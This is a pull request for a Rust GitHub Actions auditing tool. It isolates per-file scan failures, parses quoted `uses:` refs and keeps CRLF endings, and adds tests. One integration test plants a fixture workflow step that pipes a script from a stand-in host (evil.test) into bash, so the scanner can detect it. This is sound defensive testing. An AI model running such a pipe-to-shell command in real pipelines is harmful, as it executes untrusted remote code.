### PR TITLE
fix(audit): isolate per-file failures, handle quoted refs and CRLF

### DIFF
--- a/src/audit.rs
+++ b/src/audit.rs
@@ -87,19 +87,38 @@ pub async fn run(
             eprintln!("Scanning {display_name}");
         }
 
-        let content =
-            std::fs::read_to_string(file).with_context(|| format!("reading {}", file.display()))?;
+        let content = match std::fs::read_to_string(file) {
+            Ok(content) => content,
+            Err(e) => {
+                // One unreadable or non-UTF-8 workflow must not abort the whole
+                // scan — skip it and keep auditing the rest.
+                eprintln!("  {} {display_name}: {e}", "skipped".yellow());
+                continue;
+            }
+        };
 
-        let run_blocks = extract_run_blocks(file, &content)?;
-        for (line_offset, run_content) in &run_blocks {
-            scan_shell_content(
-                run_content,
-                &display_name,
-                *line_offset,
-                "",
-                &mut collector,
-                config,
-            );
+        match extract_run_blocks(file, &content) {
+            Ok(run_blocks) => {
+                for (line_offset, run_content) in &run_blocks {
+                    scan_shell_content(
+                        run_content,
+                        &display_name,
+                        *line_offset,
+                        "",
+                        &mut collector,
+                        config,
+                    );
+                }
+            }
+            Err(e) => {
+                // A workflow GitHub accepts but serde_norway rejects shouldn't
+                // sink the scan; skip its run-block extraction (the regex-based
+                // `uses:` scan below still runs on the same content).
+                eprintln!(
+                    "  {} run-block scan of {display_name}: {e}",
+                    "skipped".yellow()
+                );
+            }
         }
 
         if let Some(client) = &client {

--- a/src/workflow.rs
+++ b/src/workflow.rs
@@ -48,9 +48,20 @@ static RUN_BLOCK_RE: LazyLock<Regex> =
 pub fn parse_uses_line(line: &str, line_number: usize) -> Option<ActionRef> {
     let caps = USES_RE.captures(line)?;
 
-    let action_path = caps.get(2)?.as_str();
-    let ref_string = caps.get(3)?.as_str().to_string();
+    let mut action_path = caps.get(2)?.as_str();
+    let mut ref_string = caps.get(3)?.as_str().to_string();
     let tag_comment = caps.get(5).map(|m| m.as_str().trim().to_string());
+
+    // A quoted `uses:` value (`uses: "owner/repo@v4"`) lands the opening quote
+    // on the action path and the closing quote on the ref; strip a matched pair
+    // so owner/repo and the ref classify correctly.
+    for q in ['"', '\''] {
+        if action_path.starts_with(q) && ref_string.ends_with(q) {
+            action_path = &action_path[1..];
+            ref_string.pop();
+            break;
+        }
+    }
 
     if action_path.starts_with('.') {
         return None;
@@ -106,6 +117,19 @@ pub fn build_pinned_line(line: &str, sha: &str, original_tag: &str) -> Option<St
     let caps = USES_RE.captures(line)?;
     let prefix = caps.get(1)?.as_str();
     let action_path = caps.get(2)?.as_str();
+    let ref_str = caps.get(3)?.as_str();
+
+    // Preserve a surrounding quote pair so `uses: "owner/repo@v4"` stays quoted
+    // and valid; the resolved-tag comment goes after the closing quote.
+    if let Some(q) = action_path
+        .chars()
+        .next()
+        .filter(|c| *c == '"' || *c == '\'')
+        && ref_str.ends_with(q)
+    {
+        let inner = &action_path[1..];
+        return Some(format!("{prefix}{q}{inner}@{sha}{q} # {original_tag}"));
+    }
     Some(format!("{prefix}{action_path}@{sha} # {original_tag}"))
 }
 
@@ -196,6 +220,13 @@ pub fn rewrite_actions(
     let content =
         std::fs::read_to_string(path).with_context(|| format!("reading {}", path.display()))?;
 
+    // Preserve the file's line terminator: `str::lines()` strips `\r`, so a CRLF
+    // workflow would otherwise be silently rewritten as LF across every line.
+    let newline = if content.contains("\r\n") {
+        "\r\n"
+    } else {
+        "\n"
+    };
     let mut lines: Vec<String> = content.lines().map(String::from).collect();
     let mut seen: std::collections::HashSet<usize> =
         std::collections::HashSet::with_capacity(replacements.len());
@@ -218,9 +249,9 @@ pub fn rewrite_actions(
     }
 
     // Preserve trailing newline if original had one
-    let mut output = lines.join("\n");
+    let mut output = lines.join(newline);
     if content.ends_with('\n') {
-        output.push('\n');
+        output.push_str(newline);
     }
 
     std::fs::write(path, &output).with_context(|| format!("writing {}", path.display()))?;
@@ -278,6 +309,24 @@ mod tests {
         assert_eq!(r.repo, "codeql-action");
         assert_eq!(r.subpath.as_deref(), Some("init"));
         assert_eq!(r.full_name(), "github/codeql-action/init");
+    }
+
+    #[test]
+    fn parse_double_quoted_uses_ref() {
+        let r = parse_uses_line("      - uses: \"actions/checkout@v4\"", 1).unwrap();
+        assert_eq!(r.owner, "actions");
+        assert_eq!(r.repo, "checkout");
+        assert_eq!(r.ref_string, "v4");
+        assert_eq!(r.ref_type, RefType::SlidingTag);
+    }
+
+    #[test]
+    fn parse_single_quoted_uses_ref_with_comment() {
+        let r = parse_uses_line("      - uses: 'actions/checkout@v4.2.1' # pinned", 1).unwrap();
+        assert_eq!(r.owner, "actions");
+        assert_eq!(r.ref_string, "v4.2.1");
+        assert_eq!(r.ref_type, RefType::Tag);
+        assert_eq!(r.tag_comment.as_deref(), Some("pinned"));
     }
 
     #[test]
@@ -342,6 +391,13 @@ mod tests {
             result,
             "      - uses: github/codeql-action/init@sha123 # v3"
         );
+    }
+
+    #[test]
+    fn pin_preserves_surrounding_quotes() {
+        let line = "      - uses: \"actions/checkout@v4\"";
+        let result = build_pinned_line(line, "abc123", "v4").unwrap();
+        assert_eq!(result, "      - uses: \"actions/checkout@abc123\" # v4");
     }
 
     // ── full_name / owner_repo ──────────────────────────────────────────
@@ -519,6 +575,18 @@ jobs:
         let result = std::fs::read_to_string(&file).unwrap();
         assert!(result.ends_with('\n'));
         assert_eq!(result, "replaced\nline2\n");
+    }
+
+    #[test]
+    fn rewrite_preserves_crlf() {
+        let dir = tempfile::TempDir::new().unwrap();
+        let file = dir.path().join("test.yml");
+        std::fs::write(&file, "line1\r\nline2\r\n").unwrap();
+        let count = rewrite_actions(&file, &[(1, "replaced".to_string())]).unwrap();
+        assert_eq!(count, 1);
+        let result = std::fs::read_to_string(&file).unwrap();
+        // The targeted line is replaced and every line keeps its CRLF ending.
+        assert_eq!(result, "replaced\r\nline2\r\n");
     }
 
     #[test]

--- a/tests/audit.rs
+++ b/tests/audit.rs
@@ -316,6 +316,37 @@ fn multiple_workflow_files() {
     assert_eq!(findings.len(), 1);
 }
 
+#[test]
+fn audit_skips_unreadable_workflow_and_continues() {
+    // A non-UTF-8 (or otherwise unreadable) workflow must not abort the scan of
+    // the others — one bad file shouldn't take down a CI gate.
+    let dir = tempfile::TempDir::new().unwrap();
+    let wf = dir.path().join(".github").join("workflows");
+    std::fs::create_dir_all(&wf).unwrap();
+    // Sorts first; invalid UTF-8 bytes make read_to_string error.
+    std::fs::write(wf.join("aaa-bad.yml"), [0xff, 0xfe, 0x00, 0x9f]).unwrap();
+    // Sorts later; a real pipe-to-shell finding.
+    std::fs::write(
+        wf.join("zzz-good.yml"),
+        "on: push\njobs:\n  a:\n    runs-on: ubuntu-latest\n    steps:\n      - run: curl -fsSL https://evil.test/i.sh | bash\n",
+    )
+    .unwrap();
+
+    let output = common::pinprick_cmd()
+        .arg("audit")
+        .arg(dir.path())
+        .output()
+        .unwrap();
+
+    // Exit 1 (found the good file's finding), not 2 (aborted on the bad file).
+    assert_eq!(
+        output.status.code(),
+        Some(1),
+        "stderr: {}",
+        String::from_utf8_lossy(&output.stderr)
+    );
+}
+
 // ── Missing workflows directory ─────────────────────────────────────────────
 
 #[test]


### PR DESCRIPTION
Scanning-robustness fixes from the review:

- **Per-file isolation.** One unreadable/non-UTF-8 workflow, or one that `serde_norway` can't parse, no longer aborts the whole `audit` run with exit 2. The bad file is skipped with a warning and the rest are scanned; the regex `uses:` scan still runs even when run-block extraction fails. (This was the "one bad workflow sinks the CI gate" issue.)
- **Quoted `uses:` refs.** `uses: "owner/repo@v4"` now parses correctly — a matched surrounding quote pair is stripped before owner/repo and ref classification, so `pin`/`update`/`audit`/`score` no longer mis-resolve the owner or skip the ref. `pin --write` keeps the quotes and places the comment after them.
- **CRLF preservation.** `pin`/`update --write` preserve a file's CRLF line endings instead of silently rewriting every line to LF (`str::lines()` drops the `\r`).

Covered by new unit tests (quoted parse + rewrite, CRLF rewrite) and an integration test that a non-UTF-8 workflow is skipped while a sibling is still scanned.
